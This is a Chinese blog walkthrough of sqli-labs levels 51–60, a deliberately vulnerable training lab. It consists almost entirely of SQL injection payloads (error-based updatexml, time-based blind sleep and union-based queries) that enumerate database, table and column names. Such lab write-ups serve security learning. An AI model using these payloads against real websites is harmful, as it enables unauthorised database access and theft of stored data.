sqli-labs靶场通关攻略（51-60）

青衫木牛马

已于 2024-09-02 10:23:13 修改

阅读量1.7k

点赞数 33

文章标签：数据库 sql 经验分享

于 2024-08-30 11:41:03 首次发布

本文链接：https://blog.csdn.net/shw_yzh/article/details/141712512

版权

Less-51

步骤一：这关的参数是sort，输入?sort=1'--+

步骤二：查看数据库

?sort=1' and updatexml(1,concat(1,(select database())),1) --+

步骤三：查看表名

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

Less-52

步骤一：这关的参数是sort，输入?sort=1--+

步骤二：查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符判断第一位字符的ascii码是否大于114 页面延迟三秒访问说明数据库第一位字符ascii码大于114 :

?sort=1 and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示说明不大于大于114不大于115 说明第一位字符ascii码等于115

?sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

步骤三：查看表名

查security数据库中第一张表的第一位字符

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒访问

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

Less-53

步骤一：这关的参数是sort，输入?sort=1'--+

步骤二：查看数据库

判断数据库的第一个字符

用ascii码截取数据库的第一位字符判断第一位字符的ascii码是否大于114 页面延迟三秒访问说明数据库第一位字符ascii码大于114 :

?sort=1' and if((ascii(substr(database(),1,1))>114),sleep(3),1)--+

判断数据库第一位字符的ascii码是否大于115 页面正常显示说明不大于大于114不大于115 说明第一位字符ascii码等于115

?sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

步骤三：查看表名

查security数据库中第一张表的第一位字符

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 ,sleep(3),1)--+

页面延迟三秒访问

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101 ,sleep(3),1)--+

页面正常访问

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

Less-54

步骤一：查看数据库

?id=-1'union select 1,2,database()--+

步骤二：查看表名

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三：查看users表中列名

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

Less-55

步骤一：查看数据库

?id=-1)union select 1,2,database()--+

步骤二：查看表名

?id=-1)union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三：查看users表中列名

?id=-1)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

Less-56

步骤一：查看数据库

?id=-1')union select 1,2,database()--+

步骤二：查看表名

?id=-1')union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三：查看users表中列名

?id=-1')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

Less-57

步骤一：查看数据库

?id=-1"union select 1,2,database()--+

步骤二：查看表名

?id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤三：查看users表中列名

?id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

Less-58

步骤一：查看数据库

?id=1' and updatexml(1,concat(1,(select database())),1)--+

步骤二：查看表名

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤三：查看users表中列名

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

Less-59

步骤一：查看数据库

?id=1 and updatexml(1,concat(1,(select database())),1)

步骤二：查看表名

?id=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

步骤三：查看users表中列名

?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)

Less-60

步骤一：查看数据库

?id=1") and updatexml(1,concat(1,(select database())),1)--+

步骤二：查看表名

?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤三：查看users表中列名

?id=1")and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+